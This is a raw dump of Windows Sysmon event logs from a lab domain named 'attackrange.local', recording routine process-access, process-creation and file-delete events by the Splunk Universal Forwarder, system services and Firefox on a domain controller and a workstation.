21:45:00.671{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104724Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.671{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104723Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.671{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-70DC-60CA-2413-00000000CF01}4548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104722Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.671{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70DC-60CA-2413-00000000CF01}4548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104721Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.670{54715871-70DC-60CA-2413-00000000CF01}4548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104720Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:00.138{54715871-70DB-60CA-2313-00000000CF01}29926320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150297Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:00.362{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66F8D81023E8BE57DA479C05BB97C2FF,SHA256=74DC43724ED3C644E946463DBA9466990BB5BB7492488F66183ACC6ED6335312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104739Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.493{54715871-70DD-60CA-2513-00000000CF01}45765024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104738Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.357{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057C1F974153D9366FB0A2308776342B,SHA256=98DE77E1FF93ED7E2E40FA0074FDC49FC916AD8395C4653994D8E3087747E70A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104737Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.357{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70DD-60CA-2513-00000000CF01}4576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104736Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.354{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104735Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.354{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104734Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.354{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104733Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.354{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104732Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.354{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-70DD-60CA-2513-00000000CF01}4576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104731Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.353{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70DD-60CA-2513-00000000CF01}4576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104730Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:01.353{54715871-70DD-60CA-2513-00000000CF01}4576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150304Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.945{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=8CAEE5A07F79057F1461F15BB89162E5,SHA256=3057564ADF238A32E4B0E8D84715F3DA9EBA0F67D1BFA9AB5455F836A79F224A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150303Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.929{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=3716EA18DE89634F104C1B1E0994050C,SHA256=9EEA2DA4D4567D3FC8A7B52F735D282DBDBBDD263E734BADC71680E259F8A955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150302Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.929{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=3DE6E91945795B12EDEE62085BCC6523,SHA256=E496FA72C873A542A16FDA68BC5473DEF48DEA18D7A066CE04DBBB9DE22C5E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150301Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.929{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=2E95AAA99ACB5D5B716286E7F54F1F2E,SHA256=EA6664C089E53572448740908DB94CE8BD23F0DFC4FA7BE53E40C29DAA972CE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150300Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.929{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=91E84A14A74D120F441EE3DA47B2FCE0,SHA256=99B4ACC7F057F2AF35C01C32106C1EAF332D2E88D8646B8CE396C131C5B6F732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150299Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.929{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=F40A5F30B5AD6E7F072F83FBB5803950,SHA256=5ED11C87BC69AE7ADDF9B85FA0074979B2031B28D700BBF102090AE9A0A2FCFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150298Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:01.376{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653B54706195084EDEA34F77456C8B13,SHA256=A532B08E71B63472E0587D02BFC6091C3EB2544DE98F1620848CAD9A254A02DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104757Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.723{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA825651586ABEB443A163A2308D29A0,SHA256=0E320E3193F5F62AC76A3F302DC402470D5F3705C96032A664F5DA52CBFF19B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104756Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.723{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70DE-60CA-2713-00000000CF01}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104755Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.721{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104754Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.721{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104753Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.721{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104752Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.721{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104751Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.721{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-70DE-60CA-2713-00000000CF01}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104750Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.720{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70DE-60CA-2713-00000000CF01}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104749Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:02.720{54715871-70DE-60CA-2713-00000000CF01}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 